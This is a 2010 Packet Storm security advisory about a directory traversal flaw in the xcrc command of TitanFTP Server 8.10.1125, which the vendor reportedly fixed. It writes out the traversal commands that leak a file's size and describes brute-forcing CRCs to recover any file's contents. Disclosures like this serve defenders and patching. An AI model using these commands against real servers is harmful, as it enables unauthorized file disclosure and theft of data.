TitanFtp Server File Disclosure

2010-06-17T00:00:00
ID PACKETSTORM:90714
Type packetstorm
Reporter Bill Finalyson
Modified 2010-06-17T00:00:00

Description

                                        
                                            `Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure  
  
Details  
  
=============  
  
Product: TitanFTP Server  
  
Security-Risk: high  
  
Remote-Exploit: maybe, assuming anonymous ftp access  
  
Local-Exploit: yes  
  
Vendor URL: http://www.southrivertech.com/  
  
Found By: Bill Finlayson  
  
http://www.accensussecurity.com  
  
Affected: Versions 8.10.1125 and likely previous  
  
Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server  
  
Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size  
  
xcrc ..//..//..//..//a.txt 1 2  
xcrc ..//..//..//..//a.txt 1 3  
...  
xcrc ..//..//..//..//a.txt 1 <filesize>  
  
when automated allows for an easy brute force attack on the crc's  
  
Status: Submitted to Vendor 6/14/10 fixed 6/15/10  
`